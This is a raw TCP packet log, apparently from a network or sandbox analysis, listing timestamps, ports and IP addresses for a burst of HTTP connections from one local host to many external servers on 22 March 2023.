Mar 22, 2023 05:43:26.537832975 CET	49793	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:26.544801950 CET	49794	80	192.168.2.5	172.67.73.176
Mar 22, 2023 05:43:26.547256947 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:26.558044910 CET	49795	80	192.168.2.5	213.186.33.17
Mar 22, 2023 05:43:26.560760021 CET	80	49793	34.117.168.233	192.168.2.5
Mar 22, 2023 05:43:26.560928106 CET	49793	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:26.561235905 CET	49793	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:26.566023111 CET	80	49794	172.67.73.176	192.168.2.5
Mar 22, 2023 05:43:26.566430092 CET	49794	80	192.168.2.5	172.67.73.176
Mar 22, 2023 05:43:26.566430092 CET	49794	80	192.168.2.5	172.67.73.176
Mar 22, 2023 05:43:26.578624010 CET	49796	80	192.168.2.5	142.250.186.179
Mar 22, 2023 05:43:26.584106922 CET	80	49793	34.117.168.233	192.168.2.5
Mar 22, 2023 05:43:26.585542917 CET	80	49793	34.117.168.233	192.168.2.5
Mar 22, 2023 05:43:26.585737944 CET	49793	80	192.168.2.5	34.117.168.233
Mar 22, 2023 05:43:26.589618921 CET	80	49794	172.67.73.176	192.168.2.5
Mar 22, 2023 05:43:26.591032982 CET	80	49795	213.186.33.17	192.168.2.5
Mar 22, 2023 05:43:26.591130972 CET	49795	80	192.168.2.5	213.186.33.17
Mar 22, 2023 05:43:26.601629972 CET	80	49796	142.250.186.179	192.168.2.5
Mar 22, 2023 05:43:26.601804018 CET	49796	80	192.168.2.5	142.250.186.179
Mar 22, 2023 05:43:26.602180004 CET	80	49794	172.67.73.176	192.168.2.5
Mar 22, 2023 05:43:26.602250099 CET	49794	80	192.168.2.5	172.67.73.176
Mar 22, 2023 05:43:26.605607986 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:26.605653048 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:26.605689049 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:26.605714083 CET	49786	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:26.605726004 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:26.605751991 CET	49786	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:26.605762959 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:26.605797052 CET	49786	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:26.605801105 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:26.605830908 CET	49786	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:26.605838060 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:26.605848074 CET	49786	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:26.605875015 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:26.605887890 CET	49786	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:26.605911016 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:26.605918884 CET	49786	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:26.605974913 CET	49786	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:26.605994940 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:26.606046915 CET	49786	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:26.633589029 CET	80	49792	3.130.253.23	192.168.2.5
Mar 22, 2023 05:43:26.633704901 CET	49792	80	192.168.2.5	3.130.253.23
Mar 22, 2023 05:43:26.635118008 CET	80	49791	170.82.173.30	192.168.2.5
Mar 22, 2023 05:43:26.647001028 CET	49795	80	192.168.2.5	213.186.33.17
Mar 22, 2023 05:43:26.647093058 CET	49796	80	192.168.2.5	142.250.186.179
Mar 22, 2023 05:43:26.647516966 CET	49794	80	192.168.2.5	172.67.73.176
Mar 22, 2023 05:43:26.647756100 CET	49792	80	192.168.2.5	3.130.253.23
Mar 22, 2023 05:43:26.670037031 CET	80	49796	142.250.186.179	192.168.2.5
Mar 22, 2023 05:43:26.672241926 CET	80	49794	172.67.73.176	192.168.2.5
Mar 22, 2023 05:43:26.672327995 CET	49794	80	192.168.2.5	172.67.73.176
Mar 22, 2023 05:43:26.680819988 CET	80	49795	213.186.33.17	192.168.2.5
Mar 22, 2023 05:43:26.680869102 CET	80	49795	213.186.33.17	192.168.2.5
Mar 22, 2023 05:43:26.680893898 CET	80	49795	213.186.33.17	192.168.2.5
Mar 22, 2023 05:43:26.680895090 CET	49795	80	192.168.2.5	213.186.33.17
Mar 22, 2023 05:43:26.680942059 CET	49795	80	192.168.2.5	213.186.33.17
Mar 22, 2023 05:43:26.680948973 CET	80	49795	213.186.33.17	192.168.2.5
Mar 22, 2023 05:43:26.680986881 CET	80	49795	213.186.33.17	192.168.2.5
Mar 22, 2023 05:43:26.680996895 CET	49795	80	192.168.2.5	213.186.33.17
Mar 22, 2023 05:43:26.680996895 CET	49795	80	192.168.2.5	213.186.33.17
Mar 22, 2023 05:43:26.681013107 CET	80	49795	213.186.33.17	192.168.2.5
Mar 22, 2023 05:43:26.681060076 CET	49795	80	192.168.2.5	213.186.33.17
Mar 22, 2023 05:43:26.681060076 CET	49795	80	192.168.2.5	213.186.33.17
Mar 22, 2023 05:43:26.714812994 CET	80	49791	170.82.173.30	192.168.2.5
Mar 22, 2023 05:43:26.717856884 CET	49791	80	192.168.2.5	170.82.173.30
Mar 22, 2023 05:43:26.762321949 CET	49797	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:26.766361952 CET	80	49796	142.250.186.179	192.168.2.5
Mar 22, 2023 05:43:26.766804934 CET	49796	80	192.168.2.5	142.250.186.179
Mar 22, 2023 05:43:26.783929110 CET	49798	80	192.168.2.5	62.122.190.121
Mar 22, 2023 05:43:26.798671007 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:26.806761980 CET	80	49792	3.130.253.23	192.168.2.5
Mar 22, 2023 05:43:26.806781054 CET	80	49792	3.130.253.23	192.168.2.5
Mar 22, 2023 05:43:26.806844950 CET	49792	80	192.168.2.5	3.130.253.23
Mar 22, 2023 05:43:26.806888103 CET	49792	80	192.168.2.5	3.130.253.23
Mar 22, 2023 05:43:26.809221983 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:26.809257984 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:26.809288979 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:26.809314966 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:26.809314013 CET	49790	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:26.809340000 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:26.809366941 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:26.809416056 CET	49790	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:26.809442997 CET	49790	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:26.809818029 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:26.809910059 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:26.809963942 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:26.809978008 CET	49790	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:26.809997082 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:26.810026884 CET	49790	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:26.810054064 CET	49790	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:26.816134930 CET	49791	80	192.168.2.5	170.82.173.30
Mar 22, 2023 05:43:26.824120998 CET	80	49798	62.122.190.121	192.168.2.5
Mar 22, 2023 05:43:26.824242115 CET	49798	80	192.168.2.5	62.122.190.121
Mar 22, 2023 05:43:26.825238943 CET	49792	80	192.168.2.5	3.130.253.23
Mar 22, 2023 05:43:26.877873898 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:26.877893925 CET	80	49786	59.106.19.204	192.168.2.5
Mar 22, 2023 05:43:26.877999067 CET	49786	80	192.168.2.5	59.106.19.204
Mar 22, 2023 05:43:26.887727022 CET	49798	80	192.168.2.5	62.122.190.121
Mar 22, 2023 05:43:26.928642988 CET	80	49798	62.122.190.121	192.168.2.5
Mar 22, 2023 05:43:26.929680109 CET	80	49798	62.122.190.121	192.168.2.5
Mar 22, 2023 05:43:26.929996967 CET	49798	80	192.168.2.5	62.122.190.121
Mar 22, 2023 05:43:26.955400944 CET	80	49791	170.82.173.30	192.168.2.5
Mar 22, 2023 05:43:26.984035015 CET	80	49792	3.130.253.23	192.168.2.5
Mar 22, 2023 05:43:27.025160074 CET	49798	80	192.168.2.5	62.122.190.121
Mar 22, 2023 05:43:27.030813932 CET	80	49791	170.82.173.30	192.168.2.5
Mar 22, 2023 05:43:27.031099081 CET	49791	80	192.168.2.5	170.82.173.30
Mar 22, 2023 05:43:27.032919884 CET	80	49797	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:27.033143044 CET	49797	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:27.068845987 CET	80	49798	62.122.190.121	192.168.2.5
Mar 22, 2023 05:43:27.069792986 CET	49798	80	192.168.2.5	62.122.190.121
Mar 22, 2023 05:43:27.088294029 CET	49797	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:27.112447977 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:27.112485886 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:27.112520933 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:27.112550974 CET	49790	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:27.112584114 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:27.112595081 CET	49790	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:27.112622976 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:27.112643003 CET	49790	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:27.112652063 CET	80	49790	118.27.125.181	192.168.2.5
Mar 22, 2023 05:43:27.112674952 CET	49790	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:27.112698078 CET	49790	80	192.168.2.5	118.27.125.181
Mar 22, 2023 05:43:27.358968019 CET	80	49797	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:27.359324932 CET	80	49797	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:27.359374046 CET	80	49797	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:27.359402895 CET	80	49797	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:27.359410048 CET	49797	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:27.359436989 CET	49797	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:27.359458923 CET	49797	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:27.363081932 CET	49797	80	192.168.2.5	206.191.152.37
Mar 22, 2023 05:43:27.488670111 CET	49799	80	192.168.2.5	192.241.158.94
Mar 22, 2023 05:43:27.489655018 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:27.508531094 CET	49801	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:27.509151936 CET	49802	80	192.168.2.5	99.83.154.118
Mar 22, 2023 05:43:27.511627913 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:27.511740923 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:27.513608932 CET	49800	80	192.168.2.5	104.26.15.53
Mar 22, 2023 05:43:27.532490969 CET	80	49802	99.83.154.118	192.168.2.5
Mar 22, 2023 05:43:27.532601118 CET	49802	80	192.168.2.5	99.83.154.118
Mar 22, 2023 05:43:27.534712076 CET	80	49800	104.26.15.53	192.168.2.5
Mar 22, 2023 05:43:27.547733068 CET	49802	80	192.168.2.5	99.83.154.118
Mar 22, 2023 05:43:27.548918009 CET	49803	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:27.549082994 CET	49804	80	192.168.2.5	104.21.88.198
Mar 22, 2023 05:43:27.570710897 CET	80	49804	104.21.88.198	192.168.2.5
Mar 22, 2023 05:43:27.570843935 CET	49804	80	192.168.2.5	104.21.88.198
Mar 22, 2023 05:43:27.571331978 CET	80	49802	99.83.154.118	192.168.2.5
Mar 22, 2023 05:43:27.572077036 CET	49804	80	192.168.2.5	104.21.88.198
Mar 22, 2023 05:43:27.573869944 CET	80	49803	80.74.154.6	192.168.2.5
Mar 22, 2023 05:43:27.574011087 CET	49803	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:27.574228048 CET	80	49802	99.83.154.118	192.168.2.5
Mar 22, 2023 05:43:27.574299097 CET	49802	80	192.168.2.5	99.83.154.118
Mar 22, 2023 05:43:27.574928999 CET	49803	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:27.594176054 CET	80	49804	104.21.88.198	192.168.2.5
Mar 22, 2023 05:43:27.594933033 CET	80	49799	192.241.158.94	192.168.2.5
Mar 22, 2023 05:43:27.595055103 CET	49799	80	192.168.2.5	192.241.158.94
Mar 22, 2023 05:43:27.600169897 CET	80	49803	80.74.154.6	192.168.2.5
Mar 22, 2023 05:43:27.600357056 CET	80	49803	80.74.154.6	192.168.2.5
Mar 22, 2023 05:43:27.600630999 CET	49803	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:27.635082006 CET	80	49797	206.191.152.37	192.168.2.5
Mar 22, 2023 05:43:27.660626888 CET	80	49801	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:27.664324999 CET	49801	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:27.673151970 CET	49799	80	192.168.2.5	192.241.158.94
Mar 22, 2023 05:43:27.674268961 CET	49801	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:27.674982071 CET	49805	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:27.675147057 CET	49806	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:27.675235033 CET	49807	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:27.675322056 CET	49803	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:27.680272102 CET	80	49804	104.21.88.198	192.168.2.5
Mar 22, 2023 05:43:27.680305958 CET	80	49804	104.21.88.198	192.168.2.5
Mar 22, 2023 05:43:27.680362940 CET	80	49804	104.21.88.198	192.168.2.5
Mar 22, 2023 05:43:27.680413008 CET	49804	80	192.168.2.5	104.21.88.198
Mar 22, 2023 05:43:27.680568933 CET	49804	80	192.168.2.5	104.21.88.198
Mar 22, 2023 05:43:27.700227022 CET	80	49803	80.74.154.6	192.168.2.5
Mar 22, 2023 05:43:27.700377941 CET	49803	80	192.168.2.5	80.74.154.6
Mar 22, 2023 05:43:27.711159945 CET	80	49806	82.201.61.230	192.168.2.5
Mar 22, 2023 05:43:27.711271048 CET	49806	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:27.712996960 CET	80	49805	89.161.163.246	192.168.2.5
Mar 22, 2023 05:43:27.713120937 CET	49805	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:27.718012094 CET	80	49807	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:27.718105078 CET	49807	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:27.776801109 CET	80	49799	192.241.158.94	192.168.2.5
Mar 22, 2023 05:43:27.778814077 CET	80	49799	192.241.158.94	192.168.2.5
Mar 22, 2023 05:43:27.778947115 CET	49799	80	192.168.2.5	192.241.158.94
Mar 22, 2023 05:43:27.807802916 CET	49806	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:27.807919025 CET	49805	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:27.815874100 CET	49807	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:27.828766108 CET	80	49801	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:27.828818083 CET	80	49801	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:27.828917980 CET	49801	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:27.828917980 CET	49801	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:27.843347073 CET	80	49806	82.201.61.230	192.168.2.5
Mar 22, 2023 05:43:27.844212055 CET	80	49806	82.201.61.230	192.168.2.5
Mar 22, 2023 05:43:27.844324112 CET	49806	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:27.845083952 CET	80	49805	89.161.163.246	192.168.2.5
Mar 22, 2023 05:43:27.845515013 CET	80	49805	89.161.163.246	192.168.2.5
Mar 22, 2023 05:43:27.845638990 CET	49805	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:27.845733881 CET	80	49805	89.161.163.246	192.168.2.5
Mar 22, 2023 05:43:27.845812082 CET	49805	80	192.168.2.5	89.161.163.246
Mar 22, 2023 05:43:27.858844042 CET	80	49807	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:27.858871937 CET	80	49807	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:27.859383106 CET	49801	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:27.859519958 CET	49807	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:27.953860998 CET	49799	80	192.168.2.5	192.241.158.94
Mar 22, 2023 05:43:27.970602989 CET	49807	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:27.970671892 CET	49806	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:27.979618073 CET	49808	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:28.007006884 CET	80	49806	82.201.61.230	192.168.2.5
Mar 22, 2023 05:43:28.007744074 CET	49806	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:28.008125067 CET	80	49801	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:28.014043093 CET	80	49807	135.181.73.98	192.168.2.5
Mar 22, 2023 05:43:28.014179945 CET	49807	80	192.168.2.5	135.181.73.98
Mar 22, 2023 05:43:28.058609962 CET	80	49799	192.241.158.94	192.168.2.5
Mar 22, 2023 05:43:28.058712959 CET	49799	80	192.168.2.5	192.241.158.94
Mar 22, 2023 05:43:28.130268097 CET	80	49808	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:28.130461931 CET	49808	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:28.200578928 CET	80	49780	165.227.252.190	192.168.2.5
Mar 22, 2023 05:43:28.200661898 CET	49780	80	192.168.2.5	165.227.252.190
Mar 22, 2023 05:43:28.299529076 CET	49808	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:28.385804892 CET	49809	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:28.410116911 CET	80	49809	192.124.249.10	192.168.2.5
Mar 22, 2023 05:43:28.410296917 CET	49809	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:28.410553932 CET	49809	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:28.422555923 CET	49810	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:28.434776068 CET	80	49809	192.124.249.10	192.168.2.5
Mar 22, 2023 05:43:28.434889078 CET	80	49809	192.124.249.10	192.168.2.5
Mar 22, 2023 05:43:28.434983969 CET	49809	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:28.448893070 CET	80	49808	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:28.448954105 CET	80	49808	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:28.449173927 CET	49808	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:28.464066982 CET	80	49810	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:28.464190006 CET	49810	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:28.466059923 CET	49808	80	192.168.2.5	52.86.6.113
Mar 22, 2023 05:43:28.589124918 CET	49810	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:28.614595890 CET	49809	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:28.614917040 CET	80	49808	52.86.6.113	192.168.2.5
Mar 22, 2023 05:43:28.616687059 CET	49811	80	192.168.2.5	192.252.154.18
Mar 22, 2023 05:43:28.618000031 CET	49812	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:28.618000031 CET	49813	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:28.619026899 CET	49814	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:28.630748034 CET	80	49810	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:28.640060902 CET	80	49809	192.124.249.10	192.168.2.5
Mar 22, 2023 05:43:28.640141964 CET	49809	80	192.168.2.5	192.124.249.10
Mar 22, 2023 05:43:28.640554905 CET	80	49810	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:28.640619993 CET	49810	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:28.719702005 CET	80	49811	192.252.154.18	192.168.2.5
Mar 22, 2023 05:43:28.719830036 CET	49811	80	192.168.2.5	192.252.154.18
Mar 22, 2023 05:43:28.739531994 CET	49810	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:28.739665031 CET	49811	80	192.168.2.5	192.252.154.18
Mar 22, 2023 05:43:28.767734051 CET	80	49812	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:28.767827034 CET	49812	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:28.768281937 CET	49812	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:28.773047924 CET	49815	80	192.168.2.5	172.67.173.200
Mar 22, 2023 05:43:28.789278984 CET	80	49810	81.2.194.241	192.168.2.5
Mar 22, 2023 05:43:28.789365053 CET	49810	80	192.168.2.5	81.2.194.241
Mar 22, 2023 05:43:28.794219017 CET	80	49815	172.67.173.200	192.168.2.5
Mar 22, 2023 05:43:28.794332981 CET	49815	80	192.168.2.5	172.67.173.200
Mar 22, 2023 05:43:28.818664074 CET	49816	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:28.842847109 CET	80	49811	192.252.154.18	192.168.2.5
Mar 22, 2023 05:43:28.843179941 CET	80	49816	188.165.133.163	192.168.2.5
Mar 22, 2023 05:43:28.843363047 CET	49816	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:28.844505072 CET	80	49811	192.252.154.18	192.168.2.5
Mar 22, 2023 05:43:28.844616890 CET	49811	80	192.168.2.5	192.252.154.18
Mar 22, 2023 05:43:28.861548901 CET	49815	80	192.168.2.5	172.67.173.200
Mar 22, 2023 05:43:28.878772974 CET	49816	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:28.882807016 CET	80	49815	172.67.173.200	192.168.2.5
Mar 22, 2023 05:43:28.894834995 CET	80	49815	172.67.173.200	192.168.2.5
Mar 22, 2023 05:43:28.894987106 CET	49815	80	192.168.2.5	172.67.173.200
Mar 22, 2023 05:43:28.903197050 CET	80	49816	188.165.133.163	192.168.2.5
Mar 22, 2023 05:43:28.903243065 CET	80	49816	188.165.133.163	192.168.2.5
Mar 22, 2023 05:43:28.903347015 CET	49816	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:28.909187078 CET	80	49813	60.43.154.138	192.168.2.5
Mar 22, 2023 05:43:28.909286022 CET	49813	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:28.911844969 CET	80	49814	202.254.236.40	192.168.2.5
Mar 22, 2023 05:43:28.911951065 CET	49814	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:28.917571068 CET	80	49812	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:28.917613029 CET	80	49812	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:28.917654037 CET	49812	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:28.917691946 CET	49812	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:28.928927898 CET	49817	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:28.930085897 CET	49812	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:28.964318991 CET	80	49817	185.80.51.179	192.168.2.5
Mar 22, 2023 05:43:28.964452982 CET	49817	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:28.996485949 CET	49813	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:29.004590988 CET	49814	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:29.007736921 CET	80	49806	82.201.61.230	192.168.2.5
Mar 22, 2023 05:43:29.007894039 CET	49806	80	192.168.2.5	82.201.61.230
Mar 22, 2023 05:43:29.013755083 CET	49817	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:29.050384045 CET	80	49817	185.80.51.179	192.168.2.5
Mar 22, 2023 05:43:29.050745964 CET	80	49817	185.80.51.179	192.168.2.5
Mar 22, 2023 05:43:29.050854921 CET	49817	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:29.061340094 CET	49816	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:29.079124928 CET	80	49812	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:29.085752010 CET	80	49816	188.165.133.163	192.168.2.5
Mar 22, 2023 05:43:29.085848093 CET	49816	80	192.168.2.5	188.165.133.163
Mar 22, 2023 05:43:29.102066994 CET	49818	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:29.164145947 CET	49784	80	192.168.2.5	137.118.26.67
Mar 22, 2023 05:43:29.251571894 CET	80	49818	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:29.251678944 CET	49818	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:29.287655115 CET	80	49813	60.43.154.138	192.168.2.5
Mar 22, 2023 05:43:29.288768053 CET	80	49813	60.43.154.138	192.168.2.5
Mar 22, 2023 05:43:29.288845062 CET	49813	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:29.296487093 CET	49817	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:29.298175097 CET	80	49814	202.254.236.40	192.168.2.5
Mar 22, 2023 05:43:29.298846960 CET	80	49814	202.254.236.40	192.168.2.5
Mar 22, 2023 05:43:29.298933029 CET	49814	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:29.302397966 CET	49818	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:29.331986904 CET	80	49817	185.80.51.179	192.168.2.5
Mar 22, 2023 05:43:29.332093954 CET	49817	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:29.354077101 CET	49819	80	192.168.2.5	65.9.95.48
Mar 22, 2023 05:43:29.383268118 CET	80	49819	65.9.95.48	192.168.2.5
Mar 22, 2023 05:43:29.383765936 CET	49819	80	192.168.2.5	65.9.95.48
Mar 22, 2023 05:43:29.386657000 CET	49819	80	192.168.2.5	65.9.95.48
Mar 22, 2023 05:43:29.391565084 CET	49813	80	192.168.2.5	60.43.154.138
Mar 22, 2023 05:43:29.391633987 CET	49814	80	192.168.2.5	202.254.236.40
Mar 22, 2023 05:43:29.415580034 CET	80	49819	65.9.95.48	192.168.2.5
Mar 22, 2023 05:43:29.415852070 CET	80	49819	65.9.95.48	192.168.2.5
Mar 22, 2023 05:43:29.415908098 CET	49819	80	192.168.2.5	65.9.95.48
Mar 22, 2023 05:43:29.451108932 CET	80	49818	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:29.451133966 CET	80	49818	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:29.451196909 CET	49818	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:29.451231003 CET	49818	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:29.469153881 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:29.470371962 CET	49821	80	192.168.2.5	193.166.255.171
Mar 22, 2023 05:43:29.471389055 CET	49818	80	192.168.2.5	52.71.57.184
Mar 22, 2023 05:43:29.473077059 CET	49819	80	192.168.2.5	65.9.95.48
Mar 22, 2023 05:43:29.490411043 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:29.490576029 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:29.493815899 CET	49820	80	192.168.2.5	172.67.201.26
Mar 22, 2023 05:43:29.501975060 CET	80	49819	65.9.95.48	192.168.2.5
Mar 22, 2023 05:43:29.502973080 CET	80	49819	65.9.95.48	192.168.2.5
Mar 22, 2023 05:43:29.503043890 CET	49819	80	192.168.2.5	65.9.95.48
Mar 22, 2023 05:43:29.515230894 CET	80	49820	172.67.201.26	192.168.2.5
Mar 22, 2023 05:43:29.516072989 CET	49822	80	192.168.2.5	69.163.239.62
Mar 22, 2023 05:43:29.589001894 CET	49823	80	192.168.2.5	46.242.238.60
Mar 22, 2023 05:43:29.619980097 CET	80	49818	52.71.57.184	192.168.2.5
Mar 22, 2023 05:43:29.625710011 CET	80	49823	46.242.238.60	192.168.2.5
Mar 22, 2023 05:43:29.625777960 CET	49823	80	192.168.2.5	46.242.238.60
Mar 22, 2023 05:43:29.627872944 CET	49823	80	192.168.2.5	46.242.238.60
Mar 22, 2023 05:43:29.646456957 CET	49824	80	192.168.2.5	211.1.226.67
Mar 22, 2023 05:43:29.649187088 CET	49825	80	192.168.2.5	108.167.164.216
Mar 22, 2023 05:43:29.665160894 CET	80	49823	46.242.238.60	192.168.2.5
